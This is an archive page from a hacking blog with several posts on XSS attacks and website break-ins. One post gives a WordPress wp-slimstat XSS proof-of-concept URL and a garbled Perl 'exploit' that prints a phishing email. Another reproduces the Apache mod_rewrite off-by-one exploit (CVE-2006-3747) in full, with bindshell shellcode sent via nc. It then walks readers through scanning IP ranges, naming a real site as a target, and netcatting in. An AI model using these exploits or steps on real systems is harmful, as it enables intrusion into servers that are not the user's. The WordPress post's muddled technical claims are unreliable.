Archive forHowto XSS Hack

XSS Injection by SyntaxShadow

November 9, 2008 @ 11:08 pm · Filed under Hacker Videos, Howto XSS Hack, Tutorials, XSS Hacking Video

In this video the master hackers of SyntaxShadow demonstrate how to do injections using XSS Cross Site Scripting.

The SyntaxShadow are experts in the field of programming and hacking, and make videos demonstrating just how much hackers can do, in such little time.

For more hacking videos please visit our XSS Hacking Video page and the XSS WORM Hacker Video archives.

Comments

Website hacking with XSS - Full Disclosure

October 5, 2008 @ 6:41 am · Filed under Cross Site Scripting, Forum hacking, Hacker Videos, How to Hack, Howto XSS Hack

In this episode of Full Disclosure, the whitehat hackers explain how to hack into any website using a Cross Site Scripting attack.

Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website.

Comments (1)

How XSS Hacking Really Works

October 2, 2008 @ 2:00 am · Filed under Cross Site Request Forging, Cross Site Scripting, Howto XSS Hack, Type 2 XSS, XSS Hacking Video, XSS Worm

In this video tutorial we show you how to do basic cross site scripting attacks against a vbulletin forum. This tutorial shows the basics of cookie stealing, javascript injection and forum hacking.

Comments (2)

0day inject Exploit for Wordpress 2.3 - xssworm.com - all version vulnerable with no patch

November 13, 2007 @ 9:59 pm · Filed under 0day exploits, Application Security, Black Hat Hacking, Cross Site Request Forging, Cross Site Scripting, How to Hack, Howto XSS Hack, Reflective XSS Hacking, Vulnerable Source Code, Web Application Security, Wordpress Exploits, Wordpress Hacking

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.

Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;

Free Image Hosting at www.ImageShack.us for xss poc

Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.

We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:

–snips:

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;

–snips

With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.

Exploit code for perl whitehats included here:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS:Simple;
#use Math;
use Socket;

print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj

Comments (2)

How to Hack Tutorials - Hacking and Defacing Web Sites with Exploits

November 9, 2007 @ 9:35 am · Filed under 0day exploits, AJAX hacking, Black Hat Hacking, Cross Site Scripting, How to Hack, Howto XSS Hack, Tutorials, Web 2.0 Security

Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester

But first you must need to download the following hacking exploit:

http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0×0834ae77 for any other version/system find it.
#
# Gulcas rulez :P 

echo -e “mod_rewrite apache off-by-one overflow”
echo    “by jack <jack\x40gulcas\x2eorg>\n\n”

if [ $# -ne 1 ] ; then
  echo “Usage: $0 webserver”
  exit
fi

host=$1

echo -ne “GET /kung/ldap://localhost/`perl -e ‘print “%90″x128′`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n” | nc $host 80

# milw0rm.com [2006-08-21]

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for thoe who have no idea what to do, with that in mind, lets continue.
If you are stuck already and don’t know where to get shell, Sunjester recommends to you a backtrack attack:

if you are stuck already and dont know where to get orm how to use a shell, im using a livecd, backtrack. lets do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

Figure 1: Wget exploit downloading tutorial:

Step 2: Sunjester says to all elitehacker student:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say soemthing like “Permission Denied

Example:

Sunjestre say we need to change the files permissions, because:

this aint windows this is a secure filesystem.

ok?

so lets chmod that badboy, might as well give it 777 since im root and its just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as i said, since im root, and its a friggin livecd, this will be fine.

you should never run scripts under root on your own box.

step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace  the &quot with double quotes.

Sunjester: once your done you can save and quit vi or whatever editor you used and run it. should come out something liek below.

now that the script is working, lets look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website

since we will scan a while range or IP addresses. so type something like ::

Sunjester says to start there (festival.com) and scan away.
remember to save logs so its easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about whats on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, lets check and see fi the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of screenshots of hacking into FESTIVAL.COM  ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says : ” sweet, netcat your way in :P this should be the end of the road. if yuo are still having probelsm running this small script, seek help. you need help.  “

With special thanks to http://elitehackers.info/?pwnd=true

Comments (5)

Video: Hacker expert says Metacafe can be hacked with XSS Worm

November 9, 2007 @ 7:21 am · Filed under Application Security, Cross Site Scripting, Flash Video, Hacking Metacafe, Howto XSS Hack, Social Network Worms, Tutorials, Web 2.0 Worms, Windows Hacking Video, XSS Hacking Video, Youtube Worm

The hacker PsychoGun have discovered many security vulnerability in the popular video site Metacafe, including new serious XSS exploits.

Vulnerabilities are security holes used by hackers to hack websites or their users. When we make a research with the keyword hacking on metacafe then we can see many hacking videos.

“I do not understand why videos which speak about hacking metacafe vulnerabilities can be rejected where are many videos of hacking Windows, are rewarded” say the Hacker PsychoGun “Does Somebody Have An Answer?”

Visotors Please comment if you have knowledge of hacking metacafe videos or if you have seen these trick before

If you are new to XSS Hacking you must view our special How To Hack blogs and leave comments,

thnx you

Comments